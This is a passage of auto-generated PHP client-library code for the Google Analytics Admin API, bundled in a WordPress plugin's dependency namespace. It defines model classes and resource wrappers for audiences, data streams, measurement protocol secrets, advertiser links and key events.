\class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListGoogleAdsLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'googleAdsLinks'; protected $googleAdsLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaGoogleAdsLink::class; protected $googleAdsLinksDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaGoogleAdsLink[] */ public function setGoogleAdsLinks($googleAdsLinks) { $this->googleAdsLinks = $googleAdsLinks; } /** * @return GoogleAnalyticsAdminV1alphaGoogleAdsLink[] */ public function getGoogleAdsLinks() { return $this->googleAdsLinks; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListGoogleAdsLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListGoogleAdsLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessMetric extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessMetric::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessMetric'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $atAnyPointInTime; protected $betweenFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter::class; protected $betweenFilterDataType = ''; /** * @var string */ public $fieldName; /** * @var int */ public $inAnyNDayPeriod; protected $inListFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter::class; protected $inListFilterDataType = ''; protected $numericFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter::class; protected $numericFilterDataType = ''; protected $stringFilterType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter::class; protected $stringFilterDataType = ''; /** * @param bool */ public function setAtAnyPointInTime($atAnyPointInTime) { $this->atAnyPointInTime = $atAnyPointInTime; } /** * @return bool */ public function getAtAnyPointInTime() { return $this->atAnyPointInTime; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter */ public function setBetweenFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter $betweenFilter) { $this->betweenFilter = $betweenFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter */ public function getBetweenFilter() { return $this->betweenFilter; } /** * @param string */ public function setFieldName($fieldName) { $this->fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param int */ public function setInAnyNDayPeriod($inAnyNDayPeriod) { $this->inAnyNDayPeriod = $inAnyNDayPeriod; } /** * @return int */ public function getInAnyNDayPeriod() { return $this->inAnyNDayPeriod; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter */ public function setInListFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter $inListFilter) { $this->inListFilter = $inListFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterInListFilter */ public function getInListFilter() { return $this->inListFilter; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter */ public function setNumericFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter $numericFilter) { $this->numericFilter = $numericFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter */ public function getNumericFilter() { return $this->numericFilter; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter */ public function setStringFilter(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter $stringFilter) { $this->stringFilter = $stringFilter; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterStringFilter */ public function getStringFilter() { return $this->stringFilter; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaArchiveAudienceRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAudiencesResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "audiences" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $audiences = $analyticsadminService->audiences; * </code> */ class PropertiesAudiences extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Archives an Audience on a property. (audiences.archive) * * @param string $name Required. Example format: properties/1234/audiences/5678 * @param GoogleAnalyticsAdminV1alphaArchiveAudienceRequest $postBody * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function archive($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaArchiveAudienceRequest $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('archive', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Creates an Audience. (audiences.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1alphaAudience $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaAudience */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience::class); } /** * Lookup for a single Audience. Audiences created before 2020 may not be * supported. Default audiences will not show filter definitions. * (audiences.get) * * @param string $name Required. The name of the Audience to get. Example * format: properties/1234/audiences/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaAudience */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience::class); } /** * Lists Audiences on a property. Audiences created before 2020 may not be * supported. Default audiences will not show filter definitions. * (audiences.listPropertiesAudiences) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListAudiences` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListAudiences` must match the * call that provided the page token. * @return GoogleAnalyticsAdminV1alphaListAudiencesResponse */ public function listPropertiesAudiences($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAudiencesResponse::class); } /** * Updates an Audience on a property. (audiences.patch) * * @param string $name Output only. The resource name for this Audience * resource. Format: properties/{propertyId}/audiences/{audienceId} * @param GoogleAnalyticsAdminV1alphaAudience $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1alphaAudience */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudience::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesAudiences::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesAudiences'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListDataStreamsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "dataStreams" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $dataStreams = $analyticsadminService->properties_dataStreams; * </code> */ class PropertiesDataStreams extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a DataStream. (dataStreams.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1betaDataStream $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaDataStream * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream::class); } /** * Deletes a DataStream on a property. (dataStreams.delete) * * @param string $name Required. The name of the DataStream to delete. Example * format: properties/1234/dataStreams/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single DataStream. (dataStreams.get) * * @param string $name Required. The name of the DataStream to get. Example * format: properties/1234/dataStreams/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaDataStream * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream::class); } /** * Lists DataStreams on a property. (dataStreams.listPropertiesDataStreams) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListDataStreams` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListDataStreams` must match the * call that provided the page token. * @return GoogleAnalyticsAdminV1betaListDataStreamsResponse * @throws \Google\Service\Exception */ public function listPropertiesDataStreams($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListDataStreamsResponse::class); } /** * Updates a DataStream on a property. (dataStreams.patch) * * @param string $name Output only. Resource name of this Data Stream. Format: * properties/{property_id}/dataStreams/{stream_id} Example: * "properties/1000/dataStreams/2000" * @param GoogleAnalyticsAdminV1betaDataStream $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Omitted fields will not be updated. To replace the entire entity, use one * path with the string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaDataStream * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesDataStreams::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesDataStreams'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "measurementProtocolSecrets" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $measurementProtocolSecrets = $analyticsadminService->measurementProtocolSecrets; * </code> */ class PropertiesWebDataStreamsMeasurementProtocolSecrets extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a measurement protocol secret. (measurementProtocolSecrets.create) * * @param string $parent Required. The parent resource where this secret will be * created. Any type of stream (WebDataStream, IosAppDataStream, * AndroidAppDataStream) may be a parent. Format: * properties/{property}/webDataStreams/{webDataStream} * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } /** * Deletes target MeasurementProtocolSecret. (measurementProtocolSecrets.delete) * * @param string $name Required. The name of the MeasurementProtocolSecret to * delete. Format: properties/{property}/webDataStreams/{webDataStream}/measurem * entProtocolSecrets/{measurementProtocolSecret} Note: Any type of stream * (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be a parent. * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single "GA4" MeasurementProtocolSecret. * (measurementProtocolSecrets.get) * * @param string $name Required. The name of the measurement protocol secret to * lookup. Format: properties/{property}/webDataStreams/{webDataStream}/measurem * entProtocolSecrets/{measurementProtocolSecret} Note: Any type of stream * (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be a parent. * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } /** * Returns child MeasurementProtocolSecrets under the specified parent Property. * (measurementProtocolSecrets.listPropertiesWebDataStreamsMeasurementProtocolSe * crets) * * @param string $parent Required. The resource name of the parent stream. Any * type of stream (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be * a parent. Format: properties/{property}/webDataStreams/{webDataStream}/measur * ementProtocolSecrets * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 10 resources will be returned. The maximum value is 10. * Higher values will be coerced to the maximum. * @opt_param string pageToken A page token, received from a previous * `ListMeasurementProtocolSecrets` call. Provide this to retrieve the * subsequent page. When paginating, all other parameters provided to * `ListMeasurementProtocolSecrets` must match the call that provided the page * token. * @return GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse */ public function listPropertiesWebDataStreamsMeasurementProtocolSecrets($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse::class); } /** * Updates a measurement protocol secret. (measurementProtocolSecrets.patch) * * @param string $name Output only. Resource name of this secret. This secret * may be a child of any type of stream. Format: properties/{property}/webDataSt * reams/{webDataStream}/measurementProtocolSecrets/{measurementProtocolSecret} * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask The list of fields to be updated. Omitted fields * will not be updated. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesWebDataStreamsMeasurementProtocolSecrets::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesWebDataStreamsMeasurementProtocolSecrets'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "displayVideo360AdvertiserLinks" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $displayVideo360AdvertiserLinks = $analyticsadminService->displayVideo360AdvertiserLinks; * </code> */ class PropertiesDisplayVideo360AdvertiserLinks extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a DisplayVideo360AdvertiserLink. This can only be utilized by users * who have proper authorization both on the Google Analytics property and on * the Display & Video 360 advertiser. Users who do not have access to the * Display & Video 360 advertiser should instead seek to create a * DisplayVideo360LinkProposal. (displayVideo360AdvertiserLinks.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class); } /** * Deletes a DisplayVideo360AdvertiserLink on a property. * (displayVideo360AdvertiserLinks.delete) * * @param string $name Required. The name of the DisplayVideo360AdvertiserLink * to delete. Example format: * properties/1234/displayVideo360AdvertiserLinks/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Look up a single DisplayVideo360AdvertiserLink * (displayVideo360AdvertiserLinks.get) * * @param string $name Required. The name of the DisplayVideo360AdvertiserLink * to get. Example format: properties/1234/displayVideo360AdvertiserLink/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class); } /** * Lists all DisplayVideo360AdvertiserLinks on a property. * (displayVideo360AdvertiserLinks.listPropertiesDisplayVideo360AdvertiserLinks) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListDisplayVideo360AdvertiserLinks` call. Provide this to retrieve the * subsequent page. When paginating, all other parameters provided to * `ListDisplayVideo360AdvertiserLinks` must match the call that provided the * page token. * @return GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse */ public function listPropertiesDisplayVideo360AdvertiserLinks($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListDisplayVideo360AdvertiserLinksResponse::class); } /** * Updates a DisplayVideo360AdvertiserLink on a property. * (displayVideo360AdvertiserLinks.patch) * * @param string $name Output only. The resource name for this * DisplayVideo360AdvertiserLink resource. Format: * properties/{propertyId}/displayVideo360AdvertiserLinks/{linkId} Note: linkId * is not the Display & Video 360 Advertiser ID * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Omitted fields will not be updated. To replace the entire entity, use one * path with the string "*" to match all fields. * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesDisplayVideo360AdvertiserLinks::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesDisplayVideo360AdvertiserLinks'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListKeyEventsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "keyEvents" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $keyEvents = $analyticsadminService->properties_keyEvents; * </code> */ class PropertiesKeyEvents extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a Key Event. (keyEvents.create) * * @param string $parent Required. The resource name of the parent property * where this Key Event will be created. Format: properties/123 * @param GoogleAnalyticsAdminV1betaKeyEvent $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaKeyEvent * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return 